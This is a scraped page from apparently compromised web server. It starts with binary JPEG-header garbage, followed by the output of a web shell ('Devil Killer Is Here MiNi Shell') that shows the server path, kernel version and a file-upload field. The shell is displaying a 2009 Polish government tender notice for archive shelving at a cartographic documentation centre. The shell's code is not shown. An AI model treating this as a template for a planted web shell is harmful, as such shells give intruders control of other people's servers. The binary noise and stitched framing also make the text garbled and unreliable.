JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090911/316064-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa i montaż półek do regałów stacjonarnych i przesuwnych w Centralnym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej.</b><br>
<b>Numer ogłoszenia: 316064 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Główny Urząd Geodezji i Kartografii , ul.  Wspólna 2, 00-926 Warszawa, woj. mazowieckie, tel. 022 6618432, faks 022 6283467.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gugik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż półek do regałów stacjonarnych i przesuwnych w Centralnym Ośrodku Dokumentacji Geodezyjnej i Kartograficznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: 

1)	Dostawa i montaż półek o następujących wymiarach:
a)	750x350x30	w ilości	5400 szt. 
b)	1000x350x30		w ilości	100 szt.
c)	1200x350x30		w ilości	24 szt.

2)	Rysunki techniczne zawierające wymiary półek znajdują się w Załączniku nr 6 do SIWZ 
(6a, 6b, 6c). Poprawność wymiarów i innych danych na rysunkach technicznych należy zweryfikować przed złożeniem oferty.
3)	Demontaż i ponowny montaż 1132 półek obecnie zamontowanych w regałach będących 
w posiadaniu Zamawiającego.
4)	Montaż 100 półek, będących w posiadaniu Zamawiającego. 

2. Wymagania dotyczące realizacji zamówienia:
1)	Półki należy zamontować w regałach stacjonarnych i przesuwnych znajdujących się 
w Składnicy Materiałów Kartograficznych w budynku Centralnego Ośrodka Dokumentacji Geodezyjnej Kartograficznej  w Warszawie przy ulicy Jana Olbrachta 94. 
2)	Półki należy wykonać z blachy stalowej o grubości 0,8 mm, pomalować lakierem proszkowym odpornym na ścieranie. 
3)	Półki regału w procesie malowania proszkowego należy pokryć odpowiednią powłoką antybakteryjną i powłoką odporną na działanie tlenku etylenu. 
4)	Kolor półek: jasno-szary (RAL 7035). 
5)	Półki nie mogą posiadać ostrych krawędzi i kantów. 
6)	Półki muszą być trzykrotnie wygięte na swojej dłuższej krawędzi i jednokrotnie zagięte na krawędzi krótszej w celu zapewnienia odpowiedniej sztywności oraz bezpieczeństwa obsługi. 
7)	Wytrzymałość półki minimum 50 kg/mb. 
8)	Półki należy zamontować do ścian działowych za pomocą śrub z łbem sześciokątnym 
z gwintem na całej długości trzpienia M6x20 z klasą dokładności B i klasą własności mechanicznych 5.8, nakrętek sześciokątnych z wkładką poliamidową M6 z klasą własności mechanicznych 8 i podkładek okrągłych powiększonych M7. W ścianach działowych wykonane są otwory (rozstaw otworów w ścianach działowych należy pomierzyć przed realizacją zamówienia). 
9)	Konstrukcja regałów stacjonarnych i przesuwnych jest wykonana z blachy stalowej. Wysokość regałów wynosi 2934mm. Długość regałów stacjonarnych od 7500mm. do 8500mm, regałów przesuwnych od 3000mm do 7500mm. 
10)	Ściany działowe są rozmieszczone co ok. 700mm. (część ścian działowych jest zamontowana 
w większej odległości). Półki będą montowane w słupach co 145mm lub co 290mm. 

3.	Zamówienie obejmuje:
1)	wykonanie wszystkich zadań objętych przedmiotem zamówienia  zgodnie z obowiązującymi  przepisami i normami, a także zapewnienie wszystkich środków i materiałów niezbędnych do wykonania  zamówienia,
2)	zorganizowanie robót w sposób jak najmniej uciążliwy dla funkcjonowania Składnicy Materiałów Kartograficznych, zlokalizowanej w budynku, uwzględniając, że roboty  prowadzone będą bez wyłączenia  działalności składnicy, lub przy jej częściowym  wyłączeniu, 
3)	zastosowanie materiałów atestowanych o odpowiedniej jakości - wg obowiązujących norm,
4)	usunięcie na swój koszt wszystkich zbędnych po zakończeniu robót materiałów, których nie zagospodaruje Zamawiający oraz uporządkowanie miejsc wykonywania robót,
5)	zabezpieczenie składowanych w pomieszczeniach magazynowych i korytarzu materiałów kartograficznych przed zakurzeniem i zniszczeniem. 

4.	Wykonawca zobowiązany jest do udzielenia gwarancji na wykonane roboty. Okres gwarancji nie może być krótszy niż 2 lata.

5.	Przed terminem złożenia oferty Wykonawca powinien przeprowadzić wizję lokalną celem zapoznania się z usytuowaniem regałów, ich konstrukcją oraz rodzajem zamontowanych półek, po uprzednim uzgodnieniu terminu z Zamawiającym.

6.	Kod Wspólnego Słownika Zamówień (CPV): 39.13.11.00-0 Regały archiwalne; AA 11-1 stal..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 39.13.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O zamówienia mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
1)	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy.
2)	Spełniają warunki określone w art. 22 ust. 1 ustawy:
a)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
b)	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia. Na potwierdzenie czego wykażą się wykonaniem zamówień 
w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, polegającym na  wykonaniu przynajmniej 2 zamówień o wartości co najmniej 150 000 zł każde, polegających na dostawie i montażu regałów stacjonarnych i przesuwnych 
z podaniem wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie.
c)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, na potwierdzenie czego wykażą się posiadaniem ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 150 000 zł.
2.	Ocena spełniania w.w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte we właściwych dokumentach wyszczególnionych w rozdziale VIII niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w.w warunki Wykonawca spełnił.
3.	Zamawiający, na podstawie art. 26 ust. 3 ustawy wezwie Wykonawców, którzy w określonym terminie nie złożą oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1 ustawy, lub którzy złożyli dokumenty, o których mowa w art. 25 ust. 1 ustawy zawierające błędy lub którzy nie złożyli pełnomocnictw  lub którzy złożyli wadliwe pełnomocnictwa, do ich uzupełnienia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlega odrzuceniu lub konieczne byłoby unieważnienie postępowania. Oświadczenia lub dokumenty powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane zamówienie wymagań określonych przez Zamawiającego, nie później niż w dniu w którym upłynął termin składania ofert..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oferta musi zawierać następujące dokumenty i oświadczenia:
1)	Wypełniony Formularz ofertowy (wg Załącznika nr 1 do SIWZ).
2)	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3)	Oświadczenie, że Wykonawca spełnia warunki określone w art. 22 ust. 1 ustawy (wg Załącznika nr 2 do SIWZ).
4)	Wykaz wykonanych zamówień w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości oraz daty i miejsca wykonania 
(wg Załącznika nr 5) wraz z dokumentami potwierdzającymi, że zamówienia te zostały wykonane należycie.
5)	Polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności. Ponadto Wykonawca zobowiązany jest do złożenia oświadczenia, że po upływie terminu ważności ubezpieczenia, odnowi je na czas obejmujący okres realizacji zamówienia (wg Załącznika nr 3 do SIWZ).
6)	Pełnomocnictwo (oryginał lub kopię poświadczoną za zgodność z oryginałem przez notariusza) do podpisania oferty, jeżeli oferta nie została podpisana przez osoby upoważnione do tych czynności dokumentem rejestracyjnym.
7)	W przypadku udostępnienia potencjału technicznego i osób zdolnych do wykonywania zamówienia przez inne podmioty, przedstawią pisemne zobowiązanie tych podmiotów do ich udostępnienia.
8)	Aktualną informację z Krajowego Rejestru Karnego albo równoważnego zaświadczenia właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9)	Aktualną informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt. 2, składa dokumenty określone 
w § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87, poz. 605 z późn. zm.). Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert). 
3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczone przez Wykonawcę.
4.	Wszystkie dokumenty przedstawione w formie kserokopii muszą być poświadczone za zgodność z oryginałem przez uprawnione osoby, z wyjątkiem dokumentu o którym mowa w ust. 1 pkt 6..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.gugik.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Główny Urząd Geodezji i Kartografii
ul. Wspólna 2
00-926 Warszawa
pok. 3146.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2009 godzina 12:00, miejsce: Główny Urząd Geodezji i Kartografii
ul. Wspólna 2
00-926 Warszawa
pok. 3146.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com